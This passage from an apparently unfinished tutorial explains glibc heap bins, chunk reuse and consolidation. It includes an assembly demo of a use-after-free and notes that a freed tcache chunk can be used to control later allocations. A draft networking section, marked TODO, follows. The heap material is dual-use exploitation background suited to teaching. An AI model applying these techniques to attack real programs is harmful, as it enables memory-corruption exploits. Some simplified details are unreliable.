Say we want to reuse something from the unsortedbin, we simply look at any chunk inside of the unsortedbin that fits the size request. If no chunk meets the size to be reused, glibc sorts the unsortedbin contents into the correct buckets. Each size inside a bin's stacks or buckets are all 16 bytes apart, for example the tcache's first stack can hold 7 chunks of 32 bytes, remember that the smallest possible chunk is 32 bytes, because any allocation below 16, rounds up to 16 plus the metadata before the user data, so in total that is 32 bytes. The next stack in the tcache can hold 7 chunks of 48 bytes, and so on.
For a chunk to be reused, the allocation request must be within a certain size range, for example if we free a chunk with size 0x300, and allocate a 0x173 chunk, glibc would not just give us a chunk of the free chunk back because 0x173 does not round up to 0x300 it rounds up to 0x190, so it would make a new allocation of that size.
Once a chunk is freed, it's user data will be repurposed. If a chunk is in the tcache 8 bytes of it's user data will be reused, the first 8 bytes will be overwritten with the address of the above element in the tcache stack for that size, however the address is xored by a certain value for each thread for security. Chunks in the fastbins only get the first 8 bytes of their user data reused that points to the above chunk in the fastbins stack for that size, which is messed up intentionally for security reasons but glibc fixes it when it does something with the fastbins. However, the other bins reuse 16 bytes of the user data, the first 8 bytes are used to point to the chunk above and are not xored. The next 8 bytes are used to point to the chunk below and are also not xored.
When chunks are freed, glibc doesn't always just put them in their corresponding bins. Say we have a new free chunk, glibc will check the chunks before and after it in memory, and if either of them are free, they would be removed from whatever bin(s) they are in and merged with the chunk that was just freed. This is called consolidation. Note that consolidation only happens when the chunk that was just freed won't eventually end up in the tcache or fastbins. PREV_INUSE inside the metadata's size of the chunk is checked to see if it is 0 or not, if it is 0, the chunk before it would consolidate with it. The chunk after ours in memory will be checked, and if it's free then it consolidates with ours. If all three chunks are free, they would all consolidate. When chunks merge, the size of the new chunk is set to the sum of the all the chunks that merged and if there is an allocated chunk after this merged chunk, the allocated chunk's prev_size and PREV_INUSE get updated. After the consolidation process is finished, the final chunk is added to the unsortedbin.
At the end of the heap, there is a chunk called the top chunk or the wilderness which is a chunk that must always be free. The prev_size of the top chunk doesn't matter, however the size part does. The size of the top chunk is as big as the remaining free space at the end of the heap. The user data part of the top chunk is simply the rest of the free space at the end of the heap. Say we want to allocate something, and nothing in the bins is big enough for this allocation, glibc would carve a chunk from the beginning of the top chunk to use for the allocation, and the remaining space becomes the new top chunk with a smaller size. If the top chunk is too small, glibc would use the sbrk function which simply grows the heap by a certain amount to make the top chunk large enough.
Say we want to allocate some memory, first the bins would be checked to see if they fit the request. The bins would be checked in this order, tcache, fastbins, smallbins, unsortedbin, and largebins. If nothing fits, glibc would attempt to merge chunks that are next to each other. If nothing still fits, glibc would attempt to carve a chunk from the top chunk. If that still is not enough, glibc will grow the heap via the sbrk function and update the top chunk. If the request is massive, glibc will use the mmap syscall and use a chunk in that section.
Now let us talk about dangling pointers on the heap, as you know already a chunk of memory is selected when we call malloc/calloc/realloc, and the 16 bytes after the metadata are given to use so we can use it in any way we want. To following code shows a dangling pointer on the heap:
```
extern malloc
extern free
extern puts
global main
section .text
main:
mov edi, 10
call malloc
mov [rel dangling], rax
mov byte [rax], 'h'
mov byte [rax + 1], 'i'
mov byte [rax + 2], ' '
mov byte [rax + 3], 'r'
mov byte [rax + 4], 'e'
mov byte [rax + 5], 'a'
mov byte [rax + 6], 'd'
mov byte [rax + 7], 'e'
mov byte [rax + 8], 'r'
mov byte [rax + 9], 0
mov rdi, rax
call puts
mov rdi, [rel dangling]
call free
mov edi, 7
call malloc
mov byte [rax], 'h'
mov byte [rax + 1], 'o'
mov byte [rax + 2], 'w'
mov byte [rax + 3], 'd'
mov byte [rax + 4], 'y'
mov byte [rax + 5], '!'
mov byte [rax + 6], 0
mov rdi, [rel dangling]
mov byte [rdi], 'w'
mov rdi, rax
push rdi
call puts
pop rdi
call free
ret
section .bss
dangling resq 1
```
The above code calls malloc with 10, which results in malloc looking for any free chunk, but it finds none, so it gives back a 32 byte chunk that was never used before, and we are given a pointer to 16 bytes after the metadata, with 16 bytes to use for user data. We store the address of the start of the user data inside of dangling. Then we store the characters "hi reader", followed by a 0 to the user data. Then we print the contents of the user data. We free the address that dangling points to. We call malloc with 7, which results in malloc looking for any free chunk, it finds enough space in the tcache via the chunk we just freed, and uses that same chunk, giving us the user data back to us that we had before. We write the characters "howdy", followed by a 0 to the user data. Then we load the address that dangling points to into rdi, and we write the byte 'w' to the address rdi holds. We set rdi to rax, which is the pointer given to us from the allocation, which is actually what dangling holds. We push rdi to the stack, print the contents of the user data which will be "wowdy!", and restore the original value of rdi by popping it off the stack, and we free what rdi points to and we return from main.
The reason why "wowdy!" is the second thing to be printed instead of "howdy!" is because malloc gave us the same address to use. The above idea is called a use after free, which is when we have a pointer that points to memory which has been freed. If the freed memory gets reused, the old pointer can be used to read or write to the memory.
However, even if the data is never reused it can still be dangerous because of how glibc handles chunks. For example if we free a chunk and it ends up in the tcache and we still have control over it we may be able to control where the next allocation is if the allocation is uses the tcache.
## [[#chapter six - Introduction to networking]]
(TODO!)
A network is a way for computers to send data to each other using an agreed upon set of rules called a protocol. There are many different protocols, some of them you may have heard before such as Wi-Fi, Bluetooth, Zigbee, etc. Say we want to send data from computer A to computer B, we would need to send data using a certain protocol, and that data would have to contain certain elements like which computer is sending the data, which computer is receiving the data, and the data itself. For computers to differentiate between themselves each computer has something called a media access control (MAC) address, which is a unique identifier that is different between every computer. Computers can access each other by their MAC address but a computer can't access another computer on the other side of the world via the MAC address alone, so something called the internet protocol (IP) address was made.
For computers to receive and send data to each other they have a unique identifier called the media access control (MAC).
(TODO!)